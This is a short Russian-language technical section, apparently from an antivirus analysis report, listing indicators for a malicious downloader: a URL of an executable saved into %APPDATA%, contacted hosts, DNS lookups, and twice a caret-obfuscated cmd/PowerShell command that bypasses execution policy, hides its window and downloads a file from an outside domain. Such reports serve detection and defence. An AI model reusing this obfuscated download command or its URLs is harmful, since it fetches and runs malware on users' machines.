Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WeRs^he^LL.E^xE^ -EXE^cu^T^IONpo^L^i^Cy B^Y^P^ass -^N^op^ROF^i^le -wINDO^WST^yle HiD^d^En (NeW^-O^b^JEct SySTeM^.^N^ET.We^bcL^I^E^n^T).DowN^L^o^A^Dfi^LE('http://nexcontech....
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "pO^WeRs^he^LL.E^xE^ -EXE^cu^T^IONpo^L^i^Cy B^Y^P^ass -^N^op^ROF^i^le -wINDO^WST^yle HiD^d^En (NeW^-O^b^JEct SySTeM^.^N^ET.We^bcL^I^E^n^T).DowN^L^o^A^Dfi^LE('http://nexcontech....' (со скрытым окном)